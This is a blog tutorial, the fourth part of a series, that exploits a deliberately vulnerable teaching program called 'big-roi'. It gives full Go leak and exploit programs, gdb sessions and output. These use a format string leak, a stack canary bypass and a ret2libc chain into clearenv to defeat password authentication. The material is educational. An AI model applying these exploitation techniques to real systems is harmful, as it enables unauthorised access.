Leveraging glibc in exploitation - Part 4: An example

In part three, we introduced an example program named “big-roi” and discussed its defenses against binary exploitation. We can finally take everything we learned from the previous posts and build an exploit that leverages glibc.

Posts in this series

Putting theory into practice

In the previous part, I introduced a vulnerable example program named “big-roi”, and we examined some of the built-in defenses it possesses against binary exploitation. Now for the fun part - hacking!

The source code for big-roi can be found on GitLab.

To minimize the differences between your environment and my own, I recommend running the pre-compiled executable found within the git repository on a Ubuntu 20.04 system. The executable can be quasi-authenticated by diff’ing (or hashing) the included objdump disassembly with your own:

# Note: The provided objdump output uses "intel" syntax.
$ objdump -D -M intel big-roi > /tmp/big-roi.objdump.txt
$ diff big-roi.objdump.txt /tmp/big-roi.objdump.txt

The application takes two arguments: a TCP port to listen on, and a file path to share. The user can optionally set a password by generating a bcrypt password string, and setting an environment variable equal to the bcrypt string. For example:

# Note: This requires openssl.
# Refer to "man openssl-passwd" for more information.
$ export PASSWORD_BCRYPT=$(openssl passwd -5)
# <Type in a password and confirm it>
$ echo 'keith says to forget about it!' > /tmp/secret-data
$ ./big-roi 6666 /tmp/secret-data

Users can retrieve the file by connecting to the process over TCP and sending a password:

# Note: Make sure to not include a trailing newline character.
$ printf '%s' 'gfy' | nc 127.0.0.1 6666
incorrect password: gfy
$ printf '%s' '<actual password>' | nc 127.0.0.1 6666
keith says to forget about it!

Our goal will be to bypass the program’s password check by leveraging glibc. While this post will focus on the glibc angle, I highly encourage readers to explore other exploitation possibilities with the same security constraints we will be facing here.

Due to the complexity involved in explaining and illustrating a vulnerable program, any example will be at least slightly contrived. The more realistic the example, the more binary exploitation concepts it touches. The main goal of this example is to display something a well-intentioned programmer might implement as an experiment, which unfortunately became the next link in a chain an attacker was chomping on.

Bugs

There are two security bugs in the big-roi example. Feel free to search for them yourself before we discuss them in the next few sections - they are not meant to be difficult to find. The main theme of the bugs is that the developer got a little lazy, and made some unfortunate copy-paste choices and typos.

Outright memory corruption

Starting from the beginning of the source file, the first security bug of interest appears on lines 40 and 55:

39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58


void handleClient(int childfd, char *privateFilePath) {
  char buf[102]; /* message buffer */
  FILE *socket;
  int privateFd;
  struct stat privateStat;

  socket = fdopen(childfd, "r+b");
  if (socket == 0) {
    printf("failed to fdopen socket fd\n");
    goto done;
  }

  /*
   * read: read input string from the client
   */
  bzero(buf, sizeof(buf));
  if (read(fileno(socket), buf, 1024) < 0) {
    printf("failed to read from socket\n");
    goto done;
  }

The buf variable is a buffer (a chunk of memory) allocated on the call stack. We know it is allocated on the stack because it is a local variable, and its size (102 bytes) is known at compile time. While there is nothing inherently wrong with allocating a buffer on the stack, line 55 proceeds to read significantly more than 102 bytes into the buffer from socket, which is the connection with a TCP client. Perhaps the buffer’s size was a simple typo by the imaginary programmer :)

This is a classic stack-based buffer overflow bug. If you recall from part two of this series, the call stack (or “stack” as it is often called) is where the program stores everything a function needs to execute (such as local variables). It consists of many “stack frames” - each frame represents the state of the current executing function. A frame is identified by a beginning and end address. On a x86 64-bit CPU, this information is stored in two CPU registers:

rsp (the “top” of the stack frame, “sp” meaning “stack pointer”)
rbp (the “bottom” of the stack frame, “bp” meaning “base pointer”)

As the program executes functions, it updates the memory addresses stored in these two registers to point at different slices of the stack. Everything that falls between the addresses found in these registers constitutes the current stack frame.

The stack also stores information about the state of the program. For our part, we are interested in a very specific piece of program state: the saved return instruction pointer. This is a memory address that is used by the program to find its way back to the code that executed the current function. Unbeknownst to the programmer, this piece of information is stored alongside the programmer’s local variables.

When data “overflows” the area allocated for the programmer’s local variables, the overflowing code will eventually overwrite the saved return instruction pointer. When the function returns, the program will restore the corrupted return instruction pointer, resulting in the control flow of the program being subverted.

To be less abstract: a client could connect to big-roi, send more than 102 bytes of data, and overwrite the saved return instruction pointer with a new address. The attacker-controlled address itself is not executable code, but instead points to executable code the attacker would like to run. This can range from code contained in the vulnerable program, to code supplied by the attacker in the buf variable. In this case, we cannot place executable code in buf and execute it directly due to non-executable call stack (this is discussed in detail in part three).

It should be noted that a stack-based buffer overflow can be utilized in other ways. For example, to overwrite a variable that would permit the hacker to bypass an if condition. Here, we will turn this bug into a control flow manipulation capability.

Information leak

Not far from the stack-based buffer overflow, we can find our next bug on line 63, a format string vulnerability:

60
61
62
63
64
65
66
67


if (getenv(BCRYPT_ENV_NAME)) {
  if (strcmp(crypt(buf, getenv(BCRYPT_ENV_NAME)), getenv(BCRYPT_ENV_NAME)) != 0) {
    fprintf(socket, "incorrect password: ");
    fprintf(socket, buf, strlen(buf));
    goto done;
  }
  printf("authenticated\n");
}

The program checks if the bcrypt password environment variable is set. It then validates the user-supplied password contained in buf against the bcrypt value with crypt. If that fails, the program writes a message back to the TCP client stating that the password was incorrect along with the password the client supplied. Unfortunately, the user-controlled password is supplied to the fprintf format string function as the first argument. This means an attacker can control the format string specifiers passed to fprintf.

Format string vulnerabilities are probably worth a separate blog post due to the capabilities they grant to an attacker. If you are unfamiliar with format string vulnerabilities, the general issue lies in how format string functions work in C.

Imagine the following printf function call:

printf("%s");

While a valid format string specifier is supplied, there is no corresponding argument being passed to printf. In other words, we would normally expect to see:

printf("%s", "foo\n");

One would think missing arguments results in an empty string, literally “%s”, or a default string (like in Go) being written to stdout. Without going into too much detail, format string functions in C will essentially follow the calling convention of the Application Binary Interface (ABI) for the current processor architecture to find arguments.

On x86 64-bit processors, printf("%s") will treat whatever value is stored in the rdi CPU register as a pointer, dereference it, and then look for a null-terminated string starting at the dereferenced address. This occurs because the calling convention for x86 64-bit processors specifies that rdi holds the first argument for a function call. When there are more format specifiers than there are argument-holding CPU registers, the format string function looks to the call stack. The function will start popping data off the stack and use that data as arguments to the corresponding format specifiers.

The calling convention works a little differently on x86 32-bit processors in that CPU registers are not used for storing or pointing to arguments. Instead, arguments are stored on the call stack, and each successive argument is “popped” off the call stack.

The point is that even if you omit format specifier arguments, the format string function will look for corresponding arguments in places where it would ordinarily expect them. Once the format function “runs out of” CPU registers to check, it will access whatever happens to be stored on the call stack.

Format string functions can also be used to overwrite a process' state in a controlled way, making format string vulnerabilities incredibly devastating. The information leak capability feeds into this by allowing the hacker to discover precisely where important process state resides in memory. Leaked memory addresses can then be supplied to a format string memory overwrite attack, allowing the hacker to overwrite memory in a targeted manner.

Chances are if you find a format string vulnerability, you now have access to both read and write primitives from a single bug. A recent example of this is a format string vulnerability in the wifid daemon in Apple iOS. Initially the bug was thought to be only useful for denial of service or a limited information leak. The researchers at “ZecOps” found a novel way to abuse Objective C format string specifiers to overwrite memory, which allowed them to achieve remote code execution. ¹

While we will be focusing on the information leak capability in this post, I highly recommend reading “Exploiting Format String Vulnerabilities” by “scutt”, a hacker from the Austrian hacker group Team TESO. ² This paper in particular provides one of the best explanations of format string vulnerabilities I have found so far.

Developing an exploit

There are potentially several ways to exploit big-roi. The method I have in mind will rely on the two bugs we just discussed. First, the format string vulnerability will allow us to leak data from the call stack. This solves two problems for us:

Leaking the call stack canary
Leaking glibc addresses

This will allow us to create a stack-buffer overflow payload that will not trip the canary verification code or accidentally break other important process state. In addition, we can use the glibc addresses contained in the leak to fingerprint glibc. As we discussed in part two, this will allow us to locate helpful glibc functionality without having to worry about ASLR, or having to guess which version of glibc we are dealing with. Another reason for pursuing this is the password cannot be leaked. The program does not possess a copy of the password to begin with because it uses a bcrypt hash to verify the user’s password.

What code should we execute then? Most CTF challenges are setup so we can simply execute “/bin/sh” to get a shell. In fact, there is a neat tool named “one_gadget”, which will search glibc for a block of code that will execute the system C library function, which spawns a shell process. ³ Even if that helped us here, I think there is a more creative way to exploit this program.

Let’s take a look at the authentication code again:

60
61
62
63
64
65
66
67


if (getenv(BCRYPT_ENV_NAME)) {
  if (strcmp(crypt(buf, getenv(BCRYPT_ENV_NAME)), getenv(BCRYPT_ENV_NAME)) != 0) {
    fprintf(socket, "incorrect password: ");
    fprintf(socket, buf, strlen(buf));
    goto done;
  }
  printf("authenticated\n");
}

The optional authentication code only executes if the PASSWORD_BCRYPT environment variable is set. The program checks if the environment variable is set each time it authenticates the user. Since the program does not handle the client connection in a separate process, perhaps we can skip this code by unsetting the environment variable?

The C standard library provides a few functions that accomplish this: unsetenv and clearenv. ⁴ ⁵ Since clearenv requires no arguments, it is the easiest function to integrate into our exploit’s payload.

Leaking call stack data

Let’s start by figuring out how to leak information from the call stack. The format string vulnerability (via fprintf) will make this pretty easy for us. Recall from part two that the layout of call stack memory remains the same across executions of the program. This means the stack layout should remain the same even if the program is running on a different computer.

Before we fire up gdb or run the program, we should try to understand exactly how much memory we can leak. Once we do that, we can conduct a format string attack and compare the output to what we see in gdb when fprintf begins execution.

We know we can supply up to <size-of-buf>/2 format specifiers because each format specifier consists of at least a % followed by one character - thus one format specifier costs two bytes of buf space. The %p format specifier is particularly interesting because it will cause the format string function to read a pointer’s-worth of memory at a time, and then format it as 0x<hex-encoded-value>. These attributes are important for several reasons:

The 0x prefix can be treated as a delimiter, thus allowing us to easily parse the data into an array (more on the nuances of this later)
By reading a pointer’s worth of memory at a time, we are guaranteed to respect the layout of the call stack. While pointer values are not the only data stored on the stack, values stored there must fit in the general purpose registers (on a 64-bit processor this means a pointer is 64 bits or 8 bytes)
Since we can easily parse this data, we can treat each index in the resulting array as an individual element on the call stack
%p is probably the easiest way to ensure we receive the most data per format specifier

While the buf variable allocates 102 bytes in the source file, in reality the compiler rounds that up to make it divisible by the bits of the CPU (in this case, that is 64 bits, or 8 bytes). As a result, we actually have 104 bytes to work with. We can determine the maximum number of format specifiers that will fit in the buffer by dividing its length by two (each %p format specifier consumes two bytes). This means we can fit 52 format specifiers in the buffer. The format string function will then leak 52 pointer-sized chunks of memory. This will total to 416 bytes of memory from general CPU registers and the call stack (52 * 8 = 416).

With that in mind, go ahead and start gdb and run the program:

$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ echo 'foobar' > /tmp/secret-data
$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data

Before we write automation that takes advantage of those neat %p attributes, we need to get a sense of what fprintf will spit out. This can be done with netcat:

# Here is what six "%p" values look like:
$ echo '%p%p%p%p%p%p' | nc 127.0.0.1 6666
incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
# Where the format  |   |             |   |    |             |         |
# specifiers fall:  |%p |%p           |%p |%p  |%p           |%p       |

As you can see, the format function does not pad each value with zeros. Values that are “zero” are represented with (nil) without a leading 0x. We can work around the latter inconsistency by replacing all instances of it with 0x00. Then we can treat 0x as a delimiter and split the string into an array. This is probably not the most efficient solution, but it is simple and effective.

Here is a simple Go application that does this using only the standard library:

src: cmd/leak/main.go (click to expand)

package main

import (
	"bytes"
	"errors"
	"flag"
	"fmt"
	"io"
	"log"
	"net"
)

func main() {
	log.SetFlags(0)

	bufLenByes := flag.Int("l", 104, "The length of the buf variable in bytes")

	flag.Parse()

	if flag.NArg() != 1 {
		log.Fatalln("please specify the address to connect to")
	}

	fmtStr := bytes.Repeat([]byte("%p"), *bufLenByes/2)

	output, err := dialAndSendBytes(flag.Arg(0), fmtStr)
	if err != nil {
		log.Fatalf("failed to read all output - %s", err)
	}

	log.Printf("output from vulnerable program: '%s'", output)

	err = stackChunksFromFmtStr(output)
	if err != nil {
		log.Fatalf("failed to parse format string output - %s", err)
	}
}

func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
	conn, err := net.Dial("tcp", serverAddr)
	if err != nil {
		return nil, fmt.Errorf("failed to dial - %w", err)
	}
	defer conn.Close()

	_, err = conn.Write(b)
	if err != nil {
		return nil, fmt.Errorf("failed to write data - %w", err)
	}

	output, err := io.ReadAll(conn)
	if err != nil {
		return nil, fmt.Errorf("failed to read all output - %w", err)
	}

	return output, nil
}

// Example format string output:
//	incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
func stackChunksFromFmtStr(output []byte) error {
	if len(bytes.TrimSpace(output)) == 0 {
		return errors.New("format string func output is empty")
	}

	output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
	chunks := bytes.Split(output, []byte("0x"))
	// Start at index 1 to skip "incorrect password: ".
	chunks = chunks[1:]

	for i, chunk := range chunks {
		log.Printf("chunk %d: %s", i, chunk)
	}

	return nil
}

Execute the Go program to leak a portion of the call stack:

$ go run cmd/leak/main.go 127.0.0.1:6666
output from vulnerable program: '<data-omitted-for-brevity>'
chunk 0: 68
# ...
chunk 21: 7ffff7f826a0
chunk 22: f
chunk 23: 55555555a9d0
chunk 24: d68
chunk 25: 7ffff7e29ad1
chunk 26: 7025702570257025
chunk 27: 7025702570257025
chunk 28: 7025702570257025
chunk 29: 7025702570257025
chunk 30: 7025702570257025
chunk 31: 7025702570257025
chunk 32: 7025702570257025
chunk 33: 7025702570257025
chunk 34: 7025702570257025
chunk 35: 7025702570257025
chunk 36: 7025702570257025
chunk 37: 7025702570257025
chunk 38: 7025702570257025
chunk 39: ca9055feff69a500
chunk 40: 5555555553e0
chunk 41: 5555555559d0
chunk 42: 7fffffffe550
chunk 43: 555555555768
chunk 44: 7fffffffe8c6
chunk 45: 400000000
chunk 46: 7fffffffe5d0
chunk 47: 5555555559c6
chunk 48: 7fffffffe6c8
chunk 49: 300000000
chunk 50: 555555554040
chunk 51: 1000f0b5ff

This output tells us where each chunk of call stack memory resides in the Go slice (if you are unfamiliar with Go, think of a slice as an array). We still need to figure out what these chunks are. The first order of concern is locating where the call stack canary and the saved return instruction pointer are. Once we figure that out, we can test our exploit in gdb. Testing in gdb not only allows us to practice without ASLR, but also allows us to troubleshoot our exploit if it fails.

Naturally, there are several ways to figure out where these important values reside. In this scenario, we will use eyeballs along with gdb.

One of the first things you might have noticed is the repeating 7025702570257025 chunks. If you hex decode that chunk, you will find it is a piece of the format string stored in reverse order (p%p%p%p%). This is due to x86 storing byte sequences in little-endian order. We can identify the beginning and end indexes of the buf variable by simply looking for those chunks, which would be indexes 26 and 38, respectively.

Finding the call stack canary is straightforward because:

It will be placed after the local variables (of which buf is one)
Is 64 bits (8 bytes) in size
Is usually prefixed with 0x00 (refer to part three for more details on this)

Looking at the chunks of memory that appear after buf, there is only one chunk that matches the criteria, which is chunk 39 with the value: ca9055feff69a500 (again, reversed due to x86’s little-endianness). If there were other canary-looking chunks, we could jump into gdb to double-check our assumption - but that is not the case here.

The saved return instruction pointer is a bit trickier. To be completely honest, I expected only one chunk of memory between the canary and the saved return instruction pointer, which should be the previous stack frame’s base pointer. The saved return instruction pointer should follow after the saved base pointer. My expectation is based on various blog posts I have read. ⁶ ⁷ ⁸ In this case there are two chunks of memory that appear between the canary and the saved base pointer. I am not sure why this is, and I could not find any immediately obvious explanations for this behavior.

We can use gdb to help us find the saved return instruction pointer by pausing the program’s execution with ctrl+c. The info symbol command can then be used to trial and error our way to victory. This debugger command attempts to find a symbol (such as a function name) associated with a memory address. We can simply plug in the addresses that trail buf and look for one associated with the calling function (notifyNewClient):

^C
Program received signal SIGINT, Interrupt.
0x00007ffff7eb9237 in __libc_accept (fd=3, addr=..., len=0x7fffffffe57c) at ../sysdeps/unix/sysv/linux/accept.c:26
26	in ../sysdeps/unix/sysv/linux/accept.c
# Chunk 40:
(gdb) info symbol 0x5555555553e0
_start in section .text of /tmp/big-roi
# Chunk 41:
(gdb) info symbol 0x5555555559d0
__libc_csu_init in section .text of /tmp/big-roi
# Chunk 42:
(gdb) info symbol 0x7fffffffe550
No symbol matches 0x7fffffffe550.
# And chunk 43 is our winner!
(gdb) info symbol 0x555555555768
notifyNewClient + 48 in section .text of /tmp/big-roi

Fantastic - chunk index 43 contains the saved return instruction pointer.

Exploiting the buffer overflow

Now that we know how to programmatically retrieve and reference the call stack canary and other important memory chunks, we can build a new Go slice variable containing our exploit payload. The slice can then be “serialized” into bytes, which will overwrite the process' call stack state when we write it to big-roi via TCP.

The final binary exploitation concept we need to discuss before exploiting big-roi is return-oriented programming (ROP). ROP will allow us to subvert control flow to clearenv, and then back to the original calling function. Like format string attacks, ROP has its own nuances and strategies that could fill a dedicated blog post. Full disclosure: I will simplify how ROP works here to keep things relatively concise and readable.

The “return” in ROP refers to the behavior of the ret CPU instruction which looks up the saved return instruction pointer and jumps execution back to that address. The ret instruction accomplishes this by popping a pointer’s-worth of memory off the top of the call stack. It assumes that this chunk of memory is the saved return instruction pointer and jumps execution to whatever it points at. After the pop occurs, the stack pointer will be pointing at whatever happens to be next on the call stack. ⁹ This allows a hacker to execute code of their choosing by placing a sequence of rets on the stack.

A collection of CPU instructions that concludes with the ret instruction is known as a “ROP gadget”. A hacker can change the control flow of a process by strategically placing the addresses of ROP gadgets on the stack. Upon finishing execution, each gadget executes the next gadget simply by executing its ret. This is known as a “ROP chain”. Using ROP to execute code in glibc is sometimes referred to as “ret2libc”.

In our case, we will implement a very basic ROP chain consisting of two gadgets: the clearenv function, and the original saved return instruction pointer. When clearenv finishes executing, it will ret the original saved return instruction pointer that we strategically placed on the call stack. This will return us to the original calling function (notifyNewClient), which will then return back to the main function. Not only will this execute clearenv, but it will also guarantee that the process keeps running by resuming the original control flow.

We can test our exploit in gdb. That way we can defer fingerprinting glibc and explore ROP. To find a function’s address in gdb, we can use either of the following commands:

(gdb) info address clearenv
Symbol "clearenv" is at 0x7ffff7ddf830 in a file compiled without debugging.
(gdb) p &clearenv
$1 = (int (*)(void)) 0x7ffff7ddf830 <__clearenv>

Now that we know more about the call stack structure, here is what our exploit payload will look like:

+--------------------------------+
| 104 bytes to fill buf variable |
+--------------------------------+
| leaked call stack canary       |
+--------------------------------+
| leaked memory chunk 1          |
+--------------------------------+
| leaked memory chunk 2          |
+--------------------------------+
| leaked saved base pointer      |
+--------------------------------+
| address of the cleanenv        |
| function in glibc              |
+--------------------------------+
| original saved return          |
| instruction pointer to         |
| notifyNewClient function       |
+--------------------------------+

As we discussed earlier, x86 stores data in memory in little-endian order. The %p format specifier reverses the endianness of its arguments. Because of this, we need to reverse the endianness of any chunks of memory that fprintf spits out before we send them back to big-roi. Failing to do so will create invalid memory addresses and will cause big-roi to crash.

We can adapt the Go program from earlier to create a new slice containing the exploit payload from above, and then re-connect to get the contents of the secret file. That is what I have done here:

src: cmd/exploit/main.go (click to expand)

package main

import (
	"bytes"
	"encoding/hex"
	"flag"
	"fmt"
	"io"
	"log"
	"net"
)

func main() {
	log.SetFlags(0)

	bufLenBytes := flag.Int(
		"l",
		104,
		"The length of the buf variable in bytes")
	csCanaryIndex := flag.Int(
		"c",
		39,
		"The index of the call stack canary in the format string output")
	numChunksUntilRIP := flag.Int(
		"r",
		3,
		"The number of memory chunks between the canary and RIP")

	flag.Parse()

	if flag.NArg() != 2 {
		log.Fatalln("please specify the address to connect to and the address of clearenv")
	}

	flag.VisitAll(func(f *flag.Flag) {
		if f.Value.String() == "" || f.Value.String() == "0" {
			log.Fatalf("please specify '-%s' - %s", f.Name, f.Usage)
		}
	})

	serverAddr := flag.Arg(0)
	clearenvAddr := fmtOutputToBytesOrExit([]byte(flag.Arg(1)))
	fmtStr := bytes.Repeat([]byte("%p"), *bufLenBytes/2)

	output, err := dialAndSendBytes(serverAddr, fmtStr)
	if err != nil {
		log.Fatalf("failed to send initial payload - %s", err)
	}

	output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
	memoryChunks := bytes.Split(output, []byte("0x"))
	// Start at index 1 to skip "incorrect password: ".
	memoryChunks = memoryChunks[1:]

	log.Printf("initial output from vulnerable program: '%s'", output)

	exploitPayload := bytes.Repeat([]byte{0x41}, *bufLenBytes)

	csCanary := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex])
	log.Printf("call stack canary: '0x%x'", csCanary)
	exploitPayload = append(exploitPayload, wrongEndian(csCanary)...)

	for i := 0; i < *numChunksUntilRIP; i++ {
		garbage := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex+i+1])
		log.Printf("preserving chunk: '0x%x'", garbage)
		exploitPayload = append(exploitPayload, wrongEndian(garbage)...)
	}

	rip := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex+*numChunksUntilRIP+1])
	log.Printf("existing return instruction pointer: '0x%x'", rip)

	exploitPayload = append(exploitPayload, wrongEndian(clearenvAddr)...)
	log.Printf("clearenv address: '0x%x'", clearenvAddr)

	exploitPayload = append(exploitPayload, wrongEndian(rip)...)

	log.Printf("sending payload: 0x%x", exploitPayload)
	_, err = dialAndSendBytes(serverAddr, exploitPayload)
	if err != nil {
		log.Fatalf("failed to send exploit payload - %s", err)
	}

	log.Println("getting secret file contents...")
	fileContents, err := dialAndSendBytes(serverAddr, []byte("\n"))
	if err != nil {
		log.Fatalf("failed to get file contents - %s", err)
	}

	log.Printf("secret file contents: '%s'", fileContents)
}

func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
	conn, err := net.Dial("tcp", serverAddr)
	if err != nil {
		return nil, fmt.Errorf("failed to dial - %w", err)
	}
	defer conn.Close()

	_, err = conn.Write(b)
	if err != nil {
		return nil, fmt.Errorf("failed to write data - %w", err)
	}

	output, err := io.ReadAll(conn)
	if err != nil {
		return nil, fmt.Errorf("failed to read all output - %w", err)
	}

	return output, nil
}

func fmtOutputToBytesOrExit(b []byte) []byte {
	var tmp []byte
	for i := range b {
		// Only include hex characters (0-9, A-F, a-f).
		if (b[i] > 0x29 && b[i] < 0x3a) || (b[i] > 0x40 && b[i] < 0x47) || (b[i] > 0x60 && b[i] < 0x67) {
			tmp = append(tmp, b[i])
		}
	}

	tmpStr := string(tmp)
	if len(tmp)%2 != 0 {
		tmpStr = "0" + tmpStr
	}

	addr, err := hex.DecodeString(tmpStr)
	if err != nil {
		log.Fatalf("failed to hex decode '%s' - %s", b, err)
	}

	finalAddr := make([]byte, 8)
	if len(addr) < 8 {
		copy(finalAddr[8-len(addr):], addr)
	} else {
		finalAddr = addr
	}

	return finalAddr
}

func wrongEndian(src []byte) []byte {
	dst := make([]byte, 8)
	for i := 0; i < 8; i++ {
		dst[8-1-i] = src[i]
	}
	return dst
}

We can test the exploit using the clearenv address we obtained from the gdb’ed big-roi process:

$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7ffff7ddf830
initial output from vulnerable program: 'incorrect password: <snip>'
call stack canary: '0xca9055feff69a500'
preserving chunk: '0x00005555555553e0'
preserving chunk: '0x00005555555559d0'
preserving chunk: '0x00007fffffffe550'
existing return instruction pointer: '0x0000555555555768'
clearenv address: '0x00007ffff7ddf830'
sending payload: 0x<snip>004cf6a1794162dce053555555550000d05955555555000050e5ffffff7f000030f8ddf7ff7f00006857555555550000
getting secret file contents...
secret file contents: 'foobar
'

Locating glibc addresses

While we have successfully validated our exploit in a test environment, we still need to find clearenv’s address without the debugger’s help. Incidentally, we do need to rely on gdb just a bit more. As we examined in part two, if we can find pointers to glibc code on the stack, we can use them to work our way back to the glibc version used at runtime. Since the stack layout will be the same regardless of ASLR or other mitigations, we can simply leak those addresses by knowing where they are in the Go slice.

Start big-roi in gdb again:

$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data

And run the “leak” Go program again, this time redirect the output to stdout and grep for “ 7f”. This will filter for potential library mappings (recall from part two that this is the memory region where libraries are typically mapped to on Linux):

$ go run cmd/leak/main.go 127.0.0.1:6666 2>&1 | grep ' 7f'
chunk 1: 7fffffffe4b0
chunk 4: 7fffffffe8c6
chunk 10: 7fffffffe5d0
chunk 12: 7fffffffe6c0
chunk 15: 7fffffffe6c0
chunk 18: 7fffffffe5d0
chunk 19: 7ffff7e2800d
chunk 21: 7ffff7f826a0
chunk 25: 7ffff7e29ad1
chunk 42: 7fffffffe550
chunk 44: 7fffffffe8c6
chunk 46: 7fffffffe5d0
chunk 48: 7fffffffe6c8

And once again pause big-roi’s execution with ctrl+c and lookup each address to see if it is associated with a glibc symbol:

^C
Program received signal SIGINT, Interrupt.
# Chunk 1:
(gdb) info symbol 0x7fffffffe4b0
No symbol matches 0x7fffffffe4b0.
# Chunk 4:
(gdb) info symbol 0x7fffffffe8c6
No symbol matches 0x7fffffffe8c6.
# Chunk 10:
(gdb) info symbol 0x7fffffffe5d0
No symbol matches 0x7fffffffe5d0.
# Chunk 12:
(gdb) info symbol 0x7fffffffe6c0
No symbol matches 0x7fffffffe6c0.
# Chunk 19:
(gdb) info symbol 0x7ffff7e2800d
_IO_file_write + 45 in section .text of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 21:
(gdb) info symbol 0x7ffff7f826a0
_IO_2_1_stdout_ in section .data of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 25:
(gdb) info symbol 0x7ffff7e29ad1
_IO_do_write + 177 in section .text of /lib/x86_64-linux-gnu/libc.so.6

When info symbol locates an address in a known symbol it includes not only the symbol name and its relative offset to the symbol, but also the memory-mapped object the symbol originates from. As seen above, chunks 19, 21, and 25 are from the glibc shared object /lib/x86_64-linux-gnu/libc.so.6.

Note that gdb’s x command adds the word new to glibc symbol names when examining memory. This can add a layer of confusion when debugging an exploit.

Exploiting big-roi for real

We have developed information leak and exploit automation, and verified that both work in a test environment. It is time to exploit big-roi outside of gdb. The steps involved will be mostly the same, but this time we will add a little bit of basic arithmetic.

Start by running big-roi outside of gdb:

$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ /tmp/big-roi 6666 /tmp/secret-data

In another shell, run the leak program and find the memory chunk indexes that contain glibc pointers from earlier:

go run cmd/leak/main.go 127.0.0.1:6666
# ...
chunk 19: 7f3568bf400d
chunk 21: 7f3568d4e6a0
chunk 25: 7f3568bf5ad1
# ...

Before we can look these symbols up in a glibc database tool like libc.blukat.me, we need to do a bit of math. Remember, some of these addresses are offset from the start of the corresponding glibc code by several bytes. We need to adjust the addresses like so:

# Chunk 19: _IO_file_write + 45
0x7f3568bf400d - 0x2d = 0x7f3568bf3fe0
# Chunk 21: _IO_2_1_stdout_
0x7f3568d4e6a0
# Chunk 25: _IO_do_write + 177
0x7f3568bf5ad1 - 0xb1 = 0x7f3568bf5a20

Use one of the glibc databases we discussed in part two to lookup the symbols. In my case, libc.blukat.me narrowed it down to three possibilities:

libc6_2.31-0ubuntu9.1_amd64
libc6_2.31-0ubuntu9.2_amd64
libc6_2.31-0ubuntu9_amd64

In the real world, you would need to test for all three versions. To keep things simple, we will pretend we did that and found that option two (ubuntu9.2_amd64) is the target. These databases typically provide the relative offset of symbols from the beginning of the file. This is important because subtracting one of the symbol’s offsets from its address will reveal the base address of glibc. From there, we can add the offset of clearenv, which will yield the absolute address of the function symbol:

# <_IO_file_write addr>  <offset>   <glibc base addr>
0x7f3568bf3fe0         - 0x091fe0 = 0x7f3568b62000

# <glibc base addr>  <clearenv offset>  <clearenv addr>
0x7f3568b62000     + 0x049830         = 0x7f3568bab830

Finally, plug the calculated address of clearenv into the exploit program:

$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7f3568bab830
initial output from vulnerable program: 'incorrect password: <...>'
call stack canary: '0xdb1d60c36b92ed00'
preserving chunk: '0x000056321d4b53e0'
preserving chunk: '0x000056321d4b59d0'
preserving chunk: '0x00007fff6b51c0a0'
existing return instruction pointer: '0x000056321d4b5768'
clearenv address: '0x00007f3568bab830'
sending payload: 0x<...>00ed926bc3601ddbe0534b1d32560000d0594b1d32560000a0c0516bff7f000030b8ba68357f000068574b1d32560000
getting secret file contents...
secret file contents: 'foobar
'

w00t!

Conclusion

In this series, we examined glibc’s relationship with a vulnerable program and an exploit. We located useful process state by capitalizing on the repeatability of the call stack layout, the default higher bits of addresses (0x00007f and 0x000055), and the structure of a call stack canary. We also explored techniques for working around mitigations like ASLR and NX.

A high-level understanding of these topics allowed us to discover and leak useful information about a vulnerable program. We automated the creation and delivery of our exploit using two simple Go programs, which ultimately allowed us to bypass the vulnerable program’s built-in defenses.

The overall strategy remains largely the same despite thirty years of advancements in defenses: find a way to subvert a process' control flow, locate useful glibc code, and pivot execution to that code. Unfortunately, documentation on this subject is often fragmented or was written before the introduction of contemporary mitigations.

While esoteric, I believe this information should be easily obtainable and accurate. Not only so others can learn about binary exploitation. But also to learn from the shortcomings of iterative security mitigations.

Thank you for reading. Good night, and good luck.

References

blog.zecops.com. 2021, July 17. “Meet WiFiDemon - iOS WiFi RCE 0-day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched”. ↩︎
scutt / Team TESO. 2001, September 1. “Exploiting Format String Vulnerabilities (version 1.2)”. ↩︎
david942j. Accessed: 2022, April 20. “one_gadget - The best tool for finding one gadget RCE in libc.so.6”. ↩︎
linux.die.net. Accessed: 2022, May 1. “unsetenv(3) - Linux man page”. ↩︎
linux.die.net. Accessed: 2022, May 1. “clearenv(3) - Linux man page”. ↩︎
Bendersky, Eli. 2011, September 6. “Stack frame layout on x86-64”. ↩︎
cons.mit.edu. 2017. “X86-64 Architecture Guide”. ↩︎
Krzyzanowski, Paul. 2018, February 16. “Stack frames”. ↩︎
felixcloutier.com. Accessed: 2022, May 1. “RET - Return from Procedure”. ↩︎

2022-08-16

control.rip